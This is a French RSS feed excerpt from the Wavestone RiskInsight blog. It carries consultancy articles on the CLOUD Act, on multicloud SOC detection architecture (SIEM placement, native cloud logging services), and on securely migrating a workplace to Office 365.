<p><strong>Néanmoins, la décision de divulguer l’information est entre les mains des institutions juridiques et non des fournisseurs de Cloud</strong>&nbsp;(même s’ils peuvent contester la demande)<strong>. Par conséquent, les fournisseurs de Cloud ne peuvent être tenus responsables de la quantité de données qu’ils divulguent aux autorités par contraintes légales.</strong></p>
<p>De plus, même si nous comptons plusieurs milliers &nbsp;de demandes légales concernant plusieurs dizaines de milliers d’utilisateurs, cela&nbsp;<strong>ne représente qu’une infime partie de la quantité totale de données traitées</strong>&nbsp;par les principaux fournisseurs de Cloud. <strong>les procédures d’accès aux données restent exceptionnelles. De plus, les demandes concernent principalement les logins et les métadonnées, il n’y a, pas de cas avéré d’espionnage industrialisé avec récupération massive de données.</strong></p>
<p>Enfin, gardez à l’esprit que ces statistiques ne peuvent pas être contestées ou agrégées avec d’autres sources, il s’agit uniquement du bon vouloir des fournisseurs de Cloud&nbsp;de divulguer les données et les rapports, il faut donc les aborder avec précaution.</p>
<p>En tout cas,<strong> la notion de Cloud&nbsp;de confiance devient essentielle pour toutes les entreprises</strong>, les fournisseurs de Cloud ainsi que les autorités tendent à s’impliquer davantage sur le sujet&nbsp;<strong>comme en témoigne le nouveau partenariat entre Thales et Google pour construire une offre de Cloud souverain ou bien l’évolution prévue de la qualification SecNumCLOUD de l’ANSSI.</strong></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2021/11/le-cloud-act-une-maniere-de-rendre-les-donnees-non-souveraines/">Le C.L.O.U.D Act. : Une manière de rendre les données « non-souveraines » ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2021/11/le-cloud-act-une-maniere-de-rendre-les-donnees-non-souveraines/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Adapter sa stratégie de détection au multicloud sans se perdre dans les nuages</title>
		<link>https://www.riskinsight-wavestone.com/2021/10/adapter-sa-strategie-de-detection-au-multicloud-sans-se-perdre-dans-les-nuages/</link>
					<comments>https://www.riskinsight-wavestone.com/2021/10/adapter-sa-strategie-de-detection-au-multicloud-sans-se-perdre-dans-les-nuages/#respond</comments>
		
		<dc:creator><![CDATA[Thomas Vo-Dinh]]></dc:creator>
		<pubDate>Mon, 18 Oct 2021 12:36:00 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Eclairage]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Detection]]></category>
		<category><![CDATA[logs]]></category>
		<category><![CDATA[SIEM]]></category>
		<category><![CDATA[SOC]]></category>
		<category><![CDATA[Transformation]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=16969</guid>

					<description><![CDATA[<p>&#160; S’il y a 10 ans, construire son SOC revenait à se demander quels scénarios superviser, quelles sources de logs collecter et quel SIEM choisir, les évolutions récentes du SI proposent de nouveaux défis&#160;: comment mettre en place la supervision...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2021/10/adapter-sa-strategie-de-detection-au-multicloud-sans-se-perdre-dans-les-nuages/">Adapter sa stratégie de détection au multicloud sans se perdre dans les nuages</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>&nbsp;</p>
<p>S’il y a 10 ans, construire son SOC revenait à se demander quels scénarios superviser, quelles sources de logs collecter et quel SIEM choisir, les évolutions récentes du SI proposent de nouveaux défis&nbsp;: comment mettre en place la supervision dans un environnement partiellement on-premise et/ou multicloud&nbsp;? En effet, en 2021, avoir un SI hébergé chez plusieurs fournisseurs IaaS est plus proche de la règle que de l’exception&nbsp;; et si AWS reste l’acteur le plus rencontré, les offres d’Azure et de GCP intéressent de plus en plus d’équipes IT.</p>
<p>Comment construire sa stratégie de détection&nbsp;? Où positionner le ou les SIEM&nbsp;? Comment centraliser les logs, les alertes&nbsp;? D’ailleurs, faut-il des logs ou des alertes&nbsp;? Et comment tirer parti des solutions managées proposées par les fournisseurs cloud&nbsp;?</p>
<p>Dans cet article, nous discuterons de bonnes pratiques&nbsp;: utilisation d’une stratégie de détection bottom-up, optimisation via le choix des services natifs cloud les plus pertinents, simplification de l’architecture de collecte&nbsp;; toujours basées sur des retours d’expérience de construction de stratégies de supervision multicloud.</p>
<h2><strong>(Re)penser sa stratégie de détection pour le multicloud</strong></h2>
<p>La première question que devrait se poser l’équipe en charge du SOC est celle de la stratégie de détection. Autrement dit, quels scénarios va-t-on superviser&nbsp;?</p>
<p>Un bon réflexe cyber consiste à utiliser une approche dite «&nbsp;top-down&nbsp;»&nbsp;: partir d’une analyse de risques pour identifier les alertes à prioriser, les formaliser puis les traduire techniquement dans le SIEM. En pratique, trois facteurs démontrent que cette approche est insuffisante&nbsp;:</p>
<ul>
<li>Peu d’équipes disposent d’analyses de risques qui soient suffisamment exhaustives, à jour et pragmatiques pour permettre une déclinaison des scénarios de menaces en scénarios supervisables, en particulier pour des périmètres complexes comme le cloud public,</li>
<li>Rien ne garantit que les scénarios obtenus par cette méthode puissent concrètement être mis sous supervision, que les limites soient liées aux solutions déployées ou à la nécessité pour les équipes SOC de disposer de connaissances métier.</li>
<li>Cette approche définit quelques chemins d’attaques selon la criticité des actifs, mais ne couvre pas tous les chemins d’attaques qu’un attaquant pourrait emprunter.</li>
</ul>
<p>De ce fait, une stratégie de détection multicloud efficace sera obtenue en complétant l’approche par les risques par une approche «&nbsp;bottom-up&nbsp;»&nbsp;: en partant des capacités de journalisation des solutions dont on dispose pour identifier les alertes que le SIEM devra remonter, pour enfin prioriser en se basant sur leur intérêt en termes de couverture des risques. Partir de l’existant garantit le pragmatisme et l’efficacité de la démarche.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-16978 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-1-multicloud-1.png" alt="" width="1163" height="717" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-1-multicloud-1.png 1163w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-1-multicloud-1-310x191.png 310w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-1-multicloud-1-63x39.png 63w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-1-multicloud-1-768x473.png 768w" sizes="auto, (max-width: 1163px) 100vw, 1163px" /></p>
<p>Chez Wavestone, nous sommes de plus en plus sollicités par des clients souhaitant être accompagnés sur cette nouvelle approche. Le périmètre concerne les principales solutions utilisées en multicloud&nbsp;: Microsoft 365 (SaaS) et les solutions managées des offres IaaS des 3 principaux acteurs du marché&nbsp;: Amazon Web Services, Microsoft Azure et Google Cloud Platform.</p>
<h2><strong>Mettre en place la supervision de l’infrastructure Microsoft 365</strong></h2>
<p>Sur le papier, l’équipe SOC a toutes les clés en main pour monitorer son infrastructure cloud&nbsp;:</p>
<ul>
<li>Des logs bruts pour les services d’Office 365 (Teams, SharePoint Online, Exchange Online, etc.)</li>
<li>Des logs bruts, rapports de sécurité, alertes et Identity Secure Score pour Azure AD</li>
<li>Des logs bruts, alertes, Microsoft Secure Score et recommandations Azure pour les outils de sécurité comme ATP, AAD Identity Protection, Intune, AIP, etc.</li>
</ul>
<p>En pratique, naviguer entre les logs et tous les outils mis à disposition (et leurs consoles) peut vite devenir un casse-tête. Et si nous entendons régulièrement qu’il y a trop de logs ou d’interfaces d’administration à maîtriser, sur le terrain les difficultés sont accentuées&nbsp;:</p>
<ul>
<li>Par les faibles capacités de personnalisation des outils natifs proposés,</li>
<li>Par le manque de scénarios disponibles avec la licence achetée,</li>
<li>Par la durée de rétention de 90 jours des logs,</li>
<li>Par le manque général de compétences Office 365 ou AzureAD dans les équipes SOC.</li>
</ul>
<p>Pour éviter de se perdre, nous conseillons de simplifier le terrain de jeu autant que possible. Les bonnes pratiques consistent à penser alertes, et pas collecte de logs, puis à centraliser leur gestion dans le SIEM en utilisant des connecteurs comme ceux de Security Graph API. A titre d’exemple, il est possible d’arriver à un modèle comme celui donné ci-dessous&nbsp;:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-16981 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-2-mulcloud.png" alt="" width="1202" height="758" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-2-mulcloud.png 1202w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-2-mulcloud-303x191.png 303w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-2-mulcloud-62x39.png 62w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-2-mulcloud-768x484.png 768w" sizes="auto, (max-width: 1202px) 100vw, 1202px" /></p>
<p>Une fois l’architecture identifiée, configurer une durée de rétention de logs adaptée aux besoins (au sein d’Azure ou à l’extérieur) et entreprendre l’adaptation des processus SOC aux spécificités de M365 selon les choix réalisés lors de l’étape précédente.</p>
<h2><strong>Mettre en place la supervision des autres cloud en IaaS</strong></h2>
<p>Afin de dessiner l’architecture de collecte sur ces clouds, il convient de distinguer les différents types de logs mis à disposition par les CSP.</p>
<h3><strong>Logs</strong> <strong>système</strong></h3>
<p>Le cas des logs système générés par les VM et les flux réseau peut être traité en premier&nbsp;; il est possible de les collecter de la même manière qu’on-premise, avec des agents syslog, par exemple. Les infrastructures des CSP mettent à disposition des briques comme Log Analytics chez Azure pour faciliter la remontée.</p>
<h3><strong>Logs d’administration de l’infrastructure </strong></h3>
<p>On peut aussi envisager la supervision des opérations d’administration des composants «&nbsp;sensibles&nbsp;» de l’infrastructure (VPN, FW, scanner de vulnérabilités, etc.) comme on le ferait on-premise. En effet, la plupart de ces solutions disposent de leur pendant IaaS chez les fournisseurs cloud&nbsp;: elles s’obtiennent via la <em>Marketplace </em>et disposent de console d’administration web ou s’interfacent directement à la console de management du CSP (c’est par exemple le cas de <em>l’appliance</em> du scanner Qualys).</p>
<h3><strong>Logs des appels d’API</strong></h3>
<p>Enfin, les appels d’API réalisés par les processus/comptes sur l’infrastructure cloud et par les opérations d’administration génèrent des logs qui sont facilement récupérables via les services managés suivants&nbsp;:</p>
<ul>
<li>CloudTrail chez AWS</li>
<li>Activity Log &amp; Monitor chez Azure</li>
<li>Audit Logging chez GCP</li>
</ul>
<p>Pour éviter de se perdre, retenons la leçon suivante&nbsp;: «&nbsp;Utilisons et abusons des services natifs&nbsp;du cloud ». En effet, qui de mieux placé que le fournisseur pour proposer des services adaptés et intégrés au mieux à l’environnement&nbsp;? En pratique, nous constatons qu’implémenter la gestion des logs et des alertes cloud dans un SIEM on-premise coûte cher (même en cherchant à limiter les coûts de stockage dans la solution de supervision) et est chronophage.</p>
<p>L’utilisation du cloud implique de passer à la philosophie du cloud&nbsp;: adoptons ses codes et domptons ses services et outils. L’occasion de renforcer les synergies entre les équipes cloud et le SOC&nbsp;!</p>
<p>En synthèse, un exemple d’architecture de monitoring sur AWS est proposé ci-dessous. Il présente plusieurs façons de réaliser la supervision, en s’appuyant sur des services natifs pour les logs et pour les alertes (NB&nbsp;: tous les flux vers S3 et d’autres services n’ont pas été représentés pour des raisons de lisibilité).</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-16984 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-3-multicloud.png" alt="" width="1289" height="720" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-3-multicloud.png 1289w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-3-multicloud-342x191.png 342w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-3-multicloud-71x39.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-3-multicloud-768x429.png 768w" sizes="auto, (max-width: 1289px) 100vw, 1289px" /></p>
<h2><strong>Définir l’architecture de centralisation des alertes multicloud</strong></h2>
<p>C’est l’une des questions qui nous est la plus posée&nbsp;: quelle architecture SIEM faut-il envisager en multicloud&nbsp;? Si chaque contexte est différent, parce que chaque infrastructure IT dispose de <em>legacy</em> et d’un historique qui lui est propre, la présence d’autant de ressources et d’outils doit amener une équipe SOC à considérer l’adoption d’un SIEM dans le cloud central (comme Azure Sentinel, Splunk SaaS, etc. ; AWS et Chronicle de Google ne proposant pas à date de solution équivalente).</p>
<p>Pour aider les équipes SOC à choisir le scénario adapté, nos recommandations sont les suivantes :</p>
<ul>
<li>Privilégier le scénario à un seul SIEM central</li>
<li>Limiter autant que possible le nombre de consoles de supervision cloud</li>
<li>Remonter au maximum des alertes déjà préanalysées par les services natifs mis à disposition étudiés précédemment</li>
<li>Tirer profit des synergies éventuelles entre produits du même fournisseur&nbsp;: Azure Sentinel pour monitorer l’infrastructure Microsoft 365 par exemple</li>
<li>Tirer profit des nombreux connecteurs mis à disposition par les fournisseurs de SIEM cloud</li>
<li>Etudier les impacts de chaque scénario sur l’organisation du SOC (taille des équipes, compétences technologiques, etc.) et les coûts associés (développements nécessaires, volumétrie et coûts d’ingestion, etc.)</li>
</ul>
<p>Un exemple d’architecture reprenant l’ensemble des recommandations de cet article est proposé ci-dessous, il utilise Azure Sentinel comme SIEM cloud central.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-16988 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-4-multicloud.png" alt="" width="1595" height="773" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-4-multicloud.png 1595w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-4-multicloud-394x191.png 394w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-4-multicloud-71x34.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-4-multicloud-768x372.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/10/image-4-multicloud-1536x744.png 1536w" sizes="auto, (max-width: 1595px) 100vw, 1595px" /></p>
<p>&nbsp;</p>
<h2><strong>Synthèse&nbsp;: les principes clés à adopter pour garder la tête au-dessus des nuages</strong></h2>
<p>En résumé, l’équipe SOC souhaitant adapter sa stratégie de détection au multicloud devrait&nbsp;:</p>
<ul>
<li>Compléter son approche classique top-down par l’approche bottom-up, particulièrement adaptée au contexte complexe du multicloud,</li>
<li>Utiliser dès que c’est possible les services natifs mis à disposition par les fournisseurs afin de tirer pleinement parti des avantages du cloud,</li>
<li>Simplifier l’architecture de collecte et centraliser au maximum des alertes préanalysées par les services natifs cloud,</li>
</ul>
<p>Une fois la tête sortie du nuage, la stratégie formalisée et l’architecture de collecte déployée, le SOC retrouve bien sa place de tour de contrôle du SI&nbsp;: la prolifération des services dans le cloud ne lui fait plus peur&nbsp;!</p>
<p>Les prochaines étapes peuvent consister à étudier les possibilités d’automatisation, avec la mise en place d’un SOAR, par exemple. Nous ne manquerons pas de discuter du sujet dans un prochain article.</p>


<p>Cet article <a href="https://www.riskinsight-wavestone.com/2021/10/adapter-sa-strategie-de-detection-au-multicloud-sans-se-perdre-dans-les-nuages/">Adapter sa stratégie de détection au multicloud sans se perdre dans les nuages</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2021/10/adapter-sa-strategie-de-detection-au-multicloud-sans-se-perdre-dans-les-nuages/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Comment migrer son environnement de travail sereinement vers Office 365</title>
		<link>https://www.riskinsight-wavestone.com/2020/07/comment-migrer-son-environnement-de-travail-sereinement-vers-office-365/</link>
		
		<dc:creator><![CDATA[GEneviEveLardon]]></dc:creator>
		<pubDate>Tue, 21 Jul 2020 13:10:43 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Azure AD]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Digital Workplace]]></category>
		<category><![CDATA[How-to]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Migration]]></category>
		<category><![CDATA[Office 365]]></category>
		<category><![CDATA[protection des données]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=13937</guid>

					<description><![CDATA[<p>Les récents événements ont montré que le télétravail n’est plus un luxe pour les collaborateurs, mais une nécessité pour assurer les activités des organisations. Pour celles qui n’ont pas encore franchi le pas (principalement les ETI et le secteur public),...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2020/07/comment-migrer-son-environnement-de-travail-sereinement-vers-office-365/">Comment migrer son environnement de travail sereinement vers Office 365</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Les récents événements ont montré que le télétravail n’est plus un luxe pour les collaborateurs, mais une nécessité pour assurer les activités des organisations.</p>
<p>Pour celles qui n’ont pas encore franchi le pas (principalement les ETI et le secteur public), il est <strong>essentiel de démarrer au plus vite une réflexion autour des plateformes de collaboration et de communication Cloud</strong>. Ceci, afin de pouvoir assurer une continuité du service en cas de <a href="https://www.riskinsight-wavestone.com/2017/03/choisir-outil-de-gestion-de-crise/" target="_blank" rel="nofollow noopener noreferrer">force majeure</a> (cyberattaque, catastrophe naturelle ou même pandémie), voire même d&rsquo;envisager une migration plus conséquente.</p>
<p>Pour cette plateforme de <em>Digital Workplace</em>, <strong>une étroite collaboration entre équipe sécurité et workplace</strong> <strong>sera un prérequis</strong> !</p>
<p>Dans cet article, je souhaiterais vous faire part de quelques retours d’expérience concernant le déploiement d’Office 365, la solution de Microsoft qui tend à s’imposer chez les entreprises que nous accompagnons.</p>
<p>Il existe de nombreuses documentations intéressantes sur le sujet sur Internet (« Top 10 des bonnes pratiques » ou « 3 bonnes raisons de raccorder l’application <em>xxx </em>pour assurer votre sécurité… »). Microsoft résume une partie de ces bonnes pratiques dans ces deux articles :</p>
<ul>
<li><a href="https://docs.microsoft.com/fr-fr/microsoft-365/security/office-365-security/security-roadmap?view=o365-worldwide" target="_blank" rel="nofollow noopener noreferrer">Feuille de route sécurité Microsoft : 30, 90 jours et au-delà</a></li>
<li><a href="https://docs.microsoft.com/fr-fr/microsoft-365/admin/security-and-compliance/secure-your-business-data?view=o365-worldwide" target="_blank" rel="nofollow noopener noreferrer">10 principales façons de sécuriser les données Office 365</a></li>
</ul>
<p>Aujourd’hui, je ne veux pas refaire ici une liste non-exhaustive de ces bonnes pratiques mais plutôt vous rappeler <strong>six</strong> <strong>points d&rsquo;attention lors d&rsquo;une ouverture d’un tel service</strong>.</p>
<p>&nbsp;</p>
<h2>1/ <strong>Construire le standard de sécurité, pilier de la future relation entre les équipes sécurité et workplace</strong></h2>
<p>Comme pour tout projet de ce type, il faut commencer par évaluer le <strong>potentiel</strong> <strong>du service</strong> et voir comment il pourra répondre au besoin initial, via l’élaboration d’un <em>business case</em>. Les possibilités offertes par Office 365 sont multiples : bureautique, messagerie instantanée ou email, visualisation de données développement d’applications sans code, etc.</p>
<p>Côté équipes sécurité, deux choix se présentent : s’opposer à cette migration en raison des risques liés au Cloud américain ou accompagner la réflexion pour créer des nouveaux usages sécurisés.</p>
<p>Dans une grande majorité des cas, le second choix est préféré. Il débute alors une <strong>relation tripartite</strong>, entre les équipes workplace, la sécurité, les architectes, dont l’objectif sera de <strong>construire un service pour les utilisateurs</strong>. Un résultat de cette étape pourra être <strong>l’élaboration d’un standard de sécurité</strong>, issue d’une analyse de risques, définissant les services utilisés et avec la configuration associée.</p>
<p>Parmi les questions à traiter, on retrouve généralement les trois thématiques suivantes :</p>
<ul>
<li>Quels usages offrir à en situation de <strong>mobilité</strong> ? Moyennant quelle <strong>authentification</strong> ?</li>
<li>Quels nouveaux services proposer avec les possibilités <strong>d’intégration avec les API</strong> ?</li>
<li>Comment partager des documents avec des <strong>utilisateurs externes</strong> ?</li>
</ul>
<p>La tendance actuelle consiste à apporter des réponses avec une approche « <a href="https://www.wavestone.com/app/uploads/2017/07/generation-cybersecurity-model.pdf" target="_blank" rel="nofollow noopener noreferrer"><em>Zéro trust </em></a>». <strong>Tout écart au standard de sécurité défini devra être détecté</strong>, grâce à la mise en place de tableaux de bord et de la supervision. L’adage « La confiance n’exclut pas le contrôle » n’aura jamais eu autant de sens.</p>
<p>Cette réflexion pourra même être l’occasion de se <strong>reposer des questions fondamentales</strong> afin de poser des <strong>bases cohérentes</strong> pour l’environnement de travail. Par exemple, pourquoi laisser l’email, un système vieux de 30 ans, ouvert à tout va et bloquer à l’externe ma messagerie Teams et mes partages SharePoint ? L’amélioration de l’expérience utilisateur ne pourra se faire qu’avec <strong>l’uniformisation des pratiques de sécurité</strong>.</p>
<p>&nbsp;</p>
<div class="slate-resizable-image-embed slate-image-embed__resize-full-width">
<figure id="post-14701 media-14701" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-14701 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/07/0-5.png" alt="" width="1566" height="868" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/07/0-5.png 1566w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/07/0-5-345x191.png 345w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/07/0-5-71x39.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/07/0-5-768x426.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/07/0-5-1536x851.png 1536w" sizes="auto, (max-width: 1566px) 100vw, 1566px" /></figure>
</div>
<div></div>
<h2>2/ La protection des données, un sujet avec le vent en poupe</h2>
<p>En parallèle de la construction du service, vient le sujet des données qui seront utilisées dans le tenant. Pour le coup, deux questions simples doivent trouver des réponses (souvent complexes).</p>
<h3> Comment protéger mes données ?</h3>
<p>Aujourd’hui, les stratégies de protection des données non structurées reposent sur <a href="https://www.riskinsight-wavestone.com/2018/02/classification-incontournable-protection-donnees/" target="_blank" rel="nofollow noopener noreferrer">une base commune</a> : le <strong>rattachement d’une donnée à un niveau de sensibilité</strong>. Cette correspondance entraine des mesures de protection à mettre en place :</p>
<ul>
<li>Chiffrement avec des clés maîtrisées par le CSP ou l’organisation ;</li>
<li>Restriction des droits (ou DRM) ;</li>
<li>Accès conditionnel avec authentification multi-facteurs ;</li>
<li>Data Leakage Protection (ou DLP).</li>
</ul>
<p>Afin de ne pas surprotéger les données et ainsi, éviter de d’amoindrir l’expérience utilisateur, le chiffrement et la restriction des droits peuvent être réservées aux données les plus critiques. Les autres données resteront tout de même maîtrisées grâce à des mesures plus classiques, comme le chiffrement bout en bout et le contrôle du niveau d’exposition.</p>
<p>Un facteur clé pour un tel projet, sera d’en faire un véritable projet d’entreprise, avec un <a href="https://www.riskinsight-wavestone.com/2020/06/programme-sensibilisation-interne-wavestone-1-2/" target="_blank" rel="nofollow noopener noreferrer">programme de sensibilisation</a> complet dédié à la classification.</p>
<blockquote><p>Le chiffrement et la restriction des droits peuvent être réservées aux données les plus critiques.</p></blockquote>
<h3>Comment rester conforme avec la réglementation ?</h3>
<p>Une organisation peut être soumise à des réglementations locales, liées à ses implémentations, et sectorielles, en fonction de ses activités.</p>
<p>Ces réglementations et directives imposent dans certains cas de véritables obstacles qu’il convient de lever dès le début du projet : <strong>rétention</strong> des données, <strong>archivage légal</strong>, <strong>géolocalisation</strong>, <strong>enquête judiciaire</strong>, <strong>demandes liées à des données à caractère personnel</strong>.</p>
<p>Prenons un exemple concret : la Russie. Avec la loi sur les données à caractère personnel de 2015, l’autorité de régulation nationale impose de conserver la source (appelée base primaire) des données de ses citoyens sur le sol russe. En pratique, cela revient à dire que l’Active Directory (base primaire des identités de l’entreprise) de l’entité russe doit rester Russie. De là, les informations pourront être synchronisées avec la GAL (Global Access List) et Azure Active Directory.</p>
<p>Le <a href="https://docs.microsoft.com/en-us/microsoft-365/compliance/offering-home?view=o365-worldwide" target="_blank" rel="nofollow noopener noreferrer">Trust Center de Microsoft</a> sera très utile pour cette étape.</p>
<h3> L’épineuse question de la gestion du stock</h3>
<p>Que faire des données déjà existantes ? Il s’agit d’une problématique complexe, en particulier si l’ouverture d’une solution de collaboration Cloud est liée au décommissionnement des serveurs de fichiers existants.</p>
<p>Tout d’abord, il y a une <strong>question technique</strong>. Est-ce que le réseau de l’entreprise sera capable de supporter des migrations massives de .pst et de documents ? En particulier, il ne sera pas nécessairement utile de migrer des données qui ne seront pas conforme avec la politique de rétention.</p>
<p>Ensuite, les données historiques peuvent avoir une <strong>sensibilité hétérogène </strong>et être soumises à <strong>diverses réglementation</strong>. Un <strong>arbitrage sera nécessaire</strong>, afin d’arbitrer entre un maintien des données en local, une acceptation du risque et un projet large de classification avant ou après migration.</p>
<p>&nbsp;</p>
<h2>3/ Le Target Operating Model, garant du maintien de la sécurité dans le temps</h2>
<p>Le modèle opérationnel d’un service comme Office 365 définit les responsabilités des acteurs (administrateurs, supports, etc.) et les principes de gestion des objets. Il est complémentaire au standard de sécurité évoqué précédemment, en apportant une vision plus opérationnelle.</p>
<p>Le TOM doit être rédigé préalablement à l&rsquo;ouverture du service, et mis à jour régulièrement. Il doit inclure à minima<em> </em>les sujets suivants.</p>
<div></div>
<div class="slate-resizable-image-embed slate-image-embed__resize-full-width"><img loading="lazy" decoding="async" class="aligncenter wp-image-14703 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/07/0-6.png" alt="" width="1517" height="306" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/07/0-6.png 1517w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/07/0-6-437x88.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/07/0-6-71x14.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/07/0-6-768x155.png 768w" sizes="auto, (max-width: 1517px) 100vw, 1517px" /></div>
<div></div>
<h3><strong> Un modèle d’administration</strong></h3>
<p>Microsoft propose par défaut une cinquantaine de rôles d’administration, sans compter les rôles RBAC des services (ex : Exchange et Intune). Une utilisation pertinente de ces rôles et de rôles personnalisés permettra d’éviter d’avoir <strong>trop d’Administrateurs Généraux</strong> et de suivre le principe du moindre privilège. L’implémentation d’accès <em>Just-in-Time</em> permettra de plus de suivre <strong>l’usage réel des rôles</strong>, tout en renforçant la sécurité.</p>
<h3>Une communauté mi-architecture / mi-sécurité</h3>
<p>Comme toute plateforme SaaS, Microsoft fait évoluer régulièrement les fonctionnalités de sa suite collaborative. La mission de cette communauté sera de faire de la veille sur les tendances, afin de maîtriser les nouveaux usages et de garder le contrôle sur le tenant en tenant compte des évolutions.</p>
<h3>Le cycle de vie des identités et des espaces partagés</h3>
<p>Une gestion laissée libre des espaces partagés (Teams, SharePoint) peut entrainer une explosion du nombre d’espaces ne respectant pas le standard de sécurité. Les rapports des éditeurs de solution de Data Discovery sont assez frappants. Pour éviter cela, il est nécessaire de fixer un <strong>cycle de vie des espaces partagés</strong>. Ces règles peuvent inclure une convention de nommage, des politiques de rétention, une durée de vie, des principes quant à la gestion des droits.</p>
<p>La mise en place d’un portail unique pour la création de ces espaces permettra d’implémenter ces bonnes pratiques, tout en favorisant l’expérience utilisateur.</p>
<blockquote><p>Les rapports des éditeurs de solution de Data Discovery sont assez frappants en ce qui concerne l&rsquo;exposition des données en raison du manque de gouvernance.</p></blockquote>
<p>De même, un cycle de vie pour les <strong>objets Azure AD</strong> (incluant utilisateurs invités, groupes de sécurité, groupes Office 365 et applications) doit être défini et outillé. Voici deux exemples qui méritent d’être traités : la délégation des API est laissé ouverte et laisse la porte à des fuites de données massives ; les utilisateurs invités à collaborer ne sont jamais supprimés. Pour cela, deux stratégies sont possibles :</p>
<ol>
<li>Création d’un <em>Custom Automation Engine</em> décorrélé de l’IAM, via une application maison développée en PowerShell ;</li>
<li>Intégration d’un connecteur Powershell / Graph API à la solution IAM en place afin de présenter une gestion complète des objets en faisant abstraction de leur hébergement direct.</li>
</ol>
<p>&nbsp;</p>
<h2>4/ A<strong>bordez le sujet de l’identité des utilisateurs avec un regard neuf</strong></h2>
<p>Pilier fondateur du SaaS, le <strong>sujet de l’identité doit être abordé avec un œil neuf</strong> afin de considérer toutes les possibilités et les risques des fournisseurs d’identités (ou IdP) SaaS. En particulier, il est <strong>impensable en 2020 de considérer Azure Active Directory comme un simple Contrôleur de domaine</strong> dans le Cloud.</p>
<p>Trois approches sont possibles pour la source des identités accédant à Office 365.</p>
<h3>La dissociation des identités, un quick-win mais compliqué d’un point de vue utilisateur</h3>
<p>Il est possible de dissocier les identités local et Cloud si l’AD local n&rsquo;est plus disponible ou pour décorréler l&rsquo;espace de travail Cloud du SI historique. Ce scénario n&rsquo;est évidemment pas en faveur d&rsquo;une expérience optimale, mais peut-être un atout précieux en cas de crise ou de compromission avérée du SI.</p>
<h3>L’utilisation de l’identité locale dans le Cloud, une stratégie classique</h3>
<p>Afin de concilier sécurité et expérience utilisateur, il est nécessaire d&rsquo;utiliser la même identité entre les applications historiques et ce nouveau service. Pour cela, trois scénarios techniques sont disponibles :</p>
<ul>
<li><strong>Fédération des identités</strong> : Cette solution historique est très largement utilisée par les grandes entreprises françaises frileuses à l&rsquo;idée d&rsquo;héberger les mots de passe dans le Cloud et souhaitant avoir du SSO ;</li>
<li><strong>Synchronisation des Hash des mots de passe</strong> (<em>Password Hash Sync</em> en anglais ou PHS) : Cette solution, recommandée par Microsoft et par l&rsquo;équivalent britannique de l&rsquo;ANSSI, est implémentée une grande majorité des clients de Microsoft. Cette solution peut également être utilisée en tant que dispositif de secours lorsque le service de fédération n&rsquo;est plus disponible ;</li>
